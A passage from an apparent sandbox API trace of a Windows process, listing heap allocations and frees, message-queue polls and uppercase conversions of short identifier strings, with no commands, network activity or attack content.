hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.340] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.340] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0264.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.343] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.343] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.343] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.343] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.344] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.345] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.345] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.346] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.346] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0264.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.347] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0264.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.349] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.349] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.349] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.349] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.350] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0264.350] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.350] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.350] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.350] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.351] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.351] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.351] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.351] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.351] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.352] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.352] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.352] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.352] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0264.353] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.353] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.354] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.354] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.354] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.355] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 